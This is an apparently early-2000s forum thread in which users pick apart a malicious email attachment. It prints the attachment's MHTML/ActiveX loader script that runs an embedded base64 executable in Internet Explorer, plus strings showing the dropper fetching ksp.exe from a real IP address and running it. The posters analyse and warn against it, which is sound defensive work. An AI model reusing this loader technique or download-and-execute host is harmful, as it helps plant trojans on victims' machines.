Recieved A Strange File? thoughts

[Und3ertak3r]

Hi Guys,

Recieved a strange e-mail tonight..
Addressed as from Admin..
Subject: Newsletter
Attachment: Readme.zip (size 1.2k)
MEssage reads:

Hello , ++und3rtak3rs=email addy-removed++


New windows bug was detected , details in readme.htm file (attached) !

This is not spam ! , you get this letter because you are member of www.security.org

First: Security.ORG is a locksmiths organisation.. (well that is what I turned up when I keyed the url) So why the f are they emailing a Windows Bug warning?
Second: I haven't subscribed to this mob's newsletters.. shud I need to learn to pick locks better (mind they nearly had me..Glad I checked the Website out)
[b]Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?

Next thought I would get my Offline machine to check the file..
The contents of the Zip file was "Readme.htm"
Viewing the contents of the file useing the View feature in Winrar:

MIME-Version: 1.0
Content-Location:file:///aaa.exe
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAA
----64 or so lines removed--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

<body bgcolor=black scroll=no><script>
function f()
{s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));path=unescape(path);
document.write('<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:'+path+'\\readme.htm!file:///aaa.exe"></object>')}
setTimeout('f()',3000)</script>

great this wants to run an executable.. and it seems to be in the email?
am I right... anyone else seen this before?


Cheers

BTW.. I will see what happens when executed...

hmmm.. my security settings prevent the execution of Activex Controls..hmmm
perhaps I am glad I am not a locksmith...

I still wonder why I can't use Norton or McAfee to remove this flu I have..

[str34m3r]

Hey, Would you mind posting the zip file for us to pick apart? Call me crazy, but I enjoy doing computers forensics and reverse engineering malware.

[da'dodo]

What email account did you receive it arrive in? Was it a hotmail one by any chance? I'm sure you know what they're like.

By the looks of it somebody's trying to engineer you into running a trojan. That's my best guess. Afterall, for a bug warning, why would they need to run a message with an .exe? If they were trying to make a good impression and woo the world with their wonderful all singing all dancing warning, wouldn't they do it with JavaScript?

The whole thing screams out script kiddie, especially the black background and red writing, one who hasn't done their homework properly (security.org(!!)).

And yes it does look to be wanting to be loading it from the .htm file, or atleast somewhere on the HDD, in a temp directory (where winzip would extract the .htm file to when you double click it, this is what the unescape(path) does, I think).

[noODle]

I recieved a somewhat similar file a while back. I recieved it over irc and it was called 'mindjail.html'. (IRC-New trojan ?)
However the javascript in that file was not visible.
The script is reckonized by norton antivirus as 'trojan.sefex'. *
It is a patched IE bug afaik originally discovered by the people of malware.com (http://www.malware.com/gulp.html if I am correct)
You could try to decode it by using UUDeview for Windows but the exe is probably UPXed.
You can offcourse try to unUPX it: http://upx.sourceforge.net
I would not recommend executing it on a production machine because it is probably a trojan.

* I think norton reckonizes it because of the script because when I recreated a html file like that with a base 64 encoded 'hello world' program it got reckonized as that trojan.

I hope this can be of any help.

Cheers
noODle

[Und3ertak3r]

Here is the File,

When it executes it attempts to "Install" the aaa.exe also as mentioned in my other post.. I have a popup that says that the ActiveX Control is unable to run due to the security settings?

The message waas recieved through my local ISP (my normal email account), hotmail and Yahoo are reserved for "handing out email addy's on the net"..best spam filter i use..

Have attached the file

Cheers

edit:

BTW: NAV.. reported nothing.. extracted the HTM file and scanned seperate.. clean..hmm am I jumpy? hmm virii under the bed..(instead of red's under the bed)
hmm that is where I should be..

[noODle]

Unfortunatly I have no testbox up at the moment.
Anyway I ran bintext on it and here is the output:
===================================
File pos Mem pos ID Text
======== ======= == ====

0000004D 0040004D 0 !This program cannot be run in DOS mode.
000001A8 004001A8 0 .text
000001D0 004001D0 0 .rdata
000001F7 004001F7 0 @.data
0000066A 0040206A 0 DeleteFileA
00000678 00402078 0 ExitProcess
00000686 00402086 0 GetProcAddress
00000698 00402098 0 LoadLibraryA
000006A8 004020A8 0 WinExec
000006B2 004020B2 0 lstrcatA
000006BE 004020BE 0 lstrcpynA
000006C8 004020C8 0 kernel32.dll
00000800 00403000 0 http://64.246.56.74/~caraoke/ksp.exe
00000825 00403025 0 mshex.exe
00000847 00403047 0 Download
===================================

The file did not get reckonized as a trojan.
My first guess is that it will try to download the file from the URL^^, however the url did not exist.

[Cybr1d]

well I ran a neotrace on http://64.246.56.74/~caraoke/ksp.exe and this is what I got:
NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in Network Solutions' WHOIS database is provided by Network Solutions for information
purposes only, and to assist persons in obtaining information about or related
to a domain name registration record. Network Solutions does not guarantee its accuracy.
By submitting a WHOIS query, you agree to abide by the following terms of use:
You agree that you may use this Data only for lawful purposes and that under no
circumstances will you use this Data to: (1) allow, enable, or otherwise support
the transmission of mass unsolicited, commercial advertising or solicitations
via e-mail, telephone, or facsimile; or (2) enable high volume, automated,
electronic processes that apply to Network Solutions (or its computer systems). The
compilation, repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of Network Solutions. You agree not to use
high-volume, automated, electronic processes to access or query the WHOIS
database. Network Solutions reserves the right to terminate your access to the WHOIS
database in its sole discretion, including without limitation, for excessive
querying of the WHOIS database or for failure to otherwise abide by this policy.
Network Solutions reserves the right to modify these terms at any time.



The data in Register.com's WHOIS database is provided to you by
Register.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Register.com makes this information available as is, and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Register.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Register.com.
Register.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.


Organization:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: http://www.register.com

Domain Name: EV1.NET

Created on..............: Thu, Oct 29, 1998
Expires on..............: Thu, Oct 28, 2010
Record last updated on..: Wed, Apr 09, 2003

Administrative Contact:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net

Technical Contact:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net

Zone Contact:
Everyone's Internet
Robert Marsh
2600 Southwest Freeway
Houston, TX 77098
US
Phone: 713-400-5400
Fax..: 713-942-9332
Email: ram@ev1.net

Domain servers in listed order:

NS2.EV1.NET 216.88.77.7
NS1.EV1.NET 216.88.76.6

Register your domain name at http://www.register.com
-----------------------------------------------------------------------
OrgName: Everyones Internet, Inc.
OrgID: EVRY
Address: 2600 Southwest Frwy., Suite 500
City: Houston
StateProv: TX
PostalCode: 77098
Country: US

NetRange: 64.246.0.0 - 64.246.63.255
CIDR: 64.246.0.0/18
NetName: EVRY-BLK-9
NetHandle: NET-64-246-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.EV1.NET
NameServer: NS2.EV1.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-10-05
Updated: 2003-03-31

TechHandle: RW172-ARIN
TechName: Williams, Randy
TechPhone: +1-713-400-5400
TechEmail: admin@ev1.net

OrgTechHandle: RW172-ARIN
OrgTechName: Williams, Randy
OrgTechPhone: +1-713-400-5400
OrgTechEmail: admin@ev1.net

ARIN WHOIS database, last updated 2003-07-26 19:15
Enter ? for additional hints on searching ARIN's WHOIS database.
-------------------------------------------------------------------------
Name: rs-64-246-56-74.ev1.net
IP Address: 64.246.56.74
Location: Houston (29.761N, 95.361W)
Network: EVRY-BLK-9



Hope this helps a bit.


The previous information has been obtained either directly from the
registrant or a registrar of the domain name other than Network Solutions.
Network Solutions, therefore, does not guarantee its accuracy or completeness.

[Pecosian]

Well here's the html source that ends up being run in your browser, it's all relative though so I don't know if it would run different out of the email or if whoever made it wrote it like that and then forgot to change it when they sent it out...

<center><font color=red size=+5>Please wait loading message ..... <body scroll=no bgcolor=black><object classid="clsid:11111111-1111-1111-1111" CODEBASE="mhtml:file://C:\suspect-file\readme.htm!file:///aaa.exe"></object>

[noODle]

Pecosian,
The html you pasted will execute the base64 encoded .exe that is in the html source (but left out by Und3ertak3r).
The purpose of files like these is to trick users into opening them. Because the have the .html extension people don't suspect it. This way you can plant a trojan on a users box (providing they are using IE and have not patched their machine).
In one of the previous posts I linked to the original posted exploit finders.

Edit
Here is the securityfocus bid.
http://www.securityfocus.com/bid/6961

They state however that the bug has not been patched but to the best of my knowledge is has been patched (or atleast partly) because the 'self-executing' hello world I created does not run on my Win2k *fully patched machine but does run on my unpatched XP.

[steve.milner]

Third.. why is the message in a ZIP file? esp when the file is only 1.2k in size?

An attempt to get it through the mail server's rules (removing .exe, html mail etc) perhaps.

Any chance of posting the mail headers (with suitable changes to protect yourself) Tracking down mail is a hobby of mine.

Steve.